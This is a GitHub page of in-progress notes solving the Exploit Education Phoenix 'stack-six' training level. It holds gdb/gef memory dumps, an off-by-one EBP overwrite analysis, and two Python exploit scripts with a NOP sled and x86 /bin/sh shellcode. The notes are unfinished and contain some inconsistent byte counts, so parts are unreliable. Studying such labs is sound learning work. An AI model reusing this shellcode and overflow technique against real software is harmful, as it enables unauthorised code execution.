exploit_education_Phoenix/stack-six (in progress) at master · physine/exploit_education_Phoenix · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
The macro GREET is architecture dependent.” In this case, GREET is defined as

"Welcome home, " is 13 Bytes

which is exactly 34 bytes long (including the space & not including the quotes)


env var:

 export NAME=VALUE


payload:

 13_Bytes_(GREET) + 128_Bytes_buffer(environment variable) + padding + ret_(jmp to shellcode in buffer)


----------- gdb ---------------

jump to nop sled addr = 0xffffd5b0

greet ret val = 0x0804865f
greet ret location = 0xffffd65c

we start writing from within buffer at address 0xffffd5d7

gef> p/d 0xffffd65c - 0xffffd5d7
$2 = 133

#0xffffd5b0

where we actually start writing to buffer 0xffffd5aa
the right greet ret addr is 0xffffd62c
-------------------------------
  GNU nano 2.7.4                                 File: stack-six-exploit.py

import subprocess
import struct
import os
import sys

total_len = 133
payload = "\x90"*50 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\x$
payload += "A" * (total_len-len(payload))

payload += '\xb0\xd5\xff\xff'
#0xffffd5b0
#payload += struct.pack('<I',0xffffd5b0) # address to land us in the nop sled.  Works in gdb
#payload += '\xb2\xd6\xff\xff' # +50 addr spaceses


sys.stdout.write(payload)

#os.environ['ExploitEducation'] = payload

#subprocess.call(['./stck-six'])

-------------------------------------------
start writing from 0xffffd5da

from where we start writing in buffer to the ret of greet is 130 buffer

with env of len 126 A's write to addr 0xffffd637
and main's ret to libc is to 0xf7f8f654


0x8048673 <main+104>       mov    ecx, DWORD PTR [ebp-0x4]
    0x8048676 <main+107>       leave
    0x8048677 <main+108>       lea    esp, [ecx-0x4]
    0x804867a <main+111>       ret


$ecx   : 0x99300804 once the bin crashes

then ecx-0x4 is loaded into esp

this means the ebp must of been over writen as some stage, lest try find it

------ -- ---- --            esp
A: 0x  99 3008 04  8 bytes
B: 0x4 99 3008     7 bytes   0x4993004

so we have control of ecx

c => 0x43
our 127th byte, c, overwrites a byte of ebp at addr 0xffffd638

we are overwriting the LSB of ebp
as we can control the LSB which is one byte we can change to range of future esp values by
(0x00 to 0xff] or (0 to 255].  0x00 is null so we can use it.

user@phoenix-amd64:/opt/phoenix/i486$ export ExploitEducation=$(python -c "print 'A'*126+'\x00'")
-bash: warning: command substitution: ignored null byte in input


so, is there anywere usefull to jump to with in the range 0xffffd601 - 0xffffd6ff

gef> x/1x $bp
0xffffd638:	0xffffd643

gef> x/64xw $sp
0xffffd5a0:	0x00000000	0xf7ffb1e0	0x00000049	0x636c6557
0xffffd5b0:	0x20656d6f	0x656d6f68	0x4141202c	0x41414141
0xffffd5c0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd5d0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd5e0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd5f0:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd600:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd610:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd620:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd630:	0x41414141	0x41414141	0xffffd643	0x0804865f
0xffffd640:	0xffffdf11	0x00000000	0x00000000	0x00000000
0xffffd650:	0x00000000	0x00000000	0x00000000	0xffffdf11
0xffffd660:	0x00000000	0xffffd680	0xffffd6fc	0xf7f8f654
0xffffd670:	0xffffd6f4	0x00000001	0xffffd6fc	0xf7f8f654
0xffffd680:	0x00000001	0xffffd6f4	0xffffd6fc	0x00000008
0xffffd690:	0x00000011	0x00000000	0xf7f8f628	0xf7ffb000


looking at the env vars on the stack we find the following

0xffffdeb4:	"COLUMNS=108"
0xffffdec0:	"MAIL=/var/mail/user"
0xffffded4:	"SHELL=/bin/bash"
0xffffdee4:	"TERM=xterm-256color"
0xffffdef8:	"SHLVL=1"

0xffffdf00:	"ExploitEducation=", 'A' <repeats 126 times>, "C"

0xffffdf91:	"LOGNAME=user"
0xffffdf9e:	"PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games"
0xffffdfdc:	"/opt/phoenix/i486/stack-six"
0xffffdff8:	""

its turns out the we cant jump directly to the env as its too far way, more than 2000 bytes away
that leaves the part of the stack that containes and overflowes buffer
well we can start writing bytes from 0xffffd601 to 0xffffd637 which is right up to ebp


the A's stop at 0xffffd637 and '\x09' is at


0xffffd605:	0x41414141	0x38414141	0x5b0afb70	0x00f7fb5a


gef> x/x $bp
0xffffd609:	0x38414141
gef> x/x $bp-4
0xffffd605:	0x41414141

$eax   : 0x0
$ebx   : 0x41414141 ("AAAA"?)
$ecx   : 0x41414141 ("AAAA"?)
$edx   : 0x0
$esp   : 0xffffd60d  →  0x5b0afb70
$ebp   : 0x38414141 ("AAA8"?)
$esi   : 0xffffd6f4  →  0xffffd819  →  "/opt/phoenix/i486/stack-six"
$edi   : 0x1
$eip   : 0x08048677  →  <main+108> lea esp, [ecx-0x4]
$eflags: [carry PARITY adjust zero SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063

we now know we control ecx, now we just need to find which A's are in ecx

gef> pattern create 126
[+] Generating a pattern of 126 bytes
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabga
[+] Saved as '$_gef0'

gef> pattern search $ecx 126
[+] Searching '$ecx'
[+] Found at offset 75 (little-endian search) likely
[+] Found at offset 74 (big-endian search)
gef>


the A's around where esp is are being overwriten so we will have to jump to our env as it will always be intact, and its located at 0xffffdf00
we can add a nop sled for easy targeting


Python exploit script

import subprocess
import struct
import os
import sys

total_len = 127

shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
payload = "\x90"*(75-len(shellcode))
payload += shellcode
payload += "\x01\xdf\xff\xff"
payload += "A"*47 + "\x09"

if len(payload) != 127:
	print "err not 127 bytes"
sys.stdout.write(payload)


0x ff ff df 01

jump to 0xffffdf20 to hit nop sled

TODO: Figure out why the nops of the nop sled are not being recognised as institutions and thus not giving a reverse shell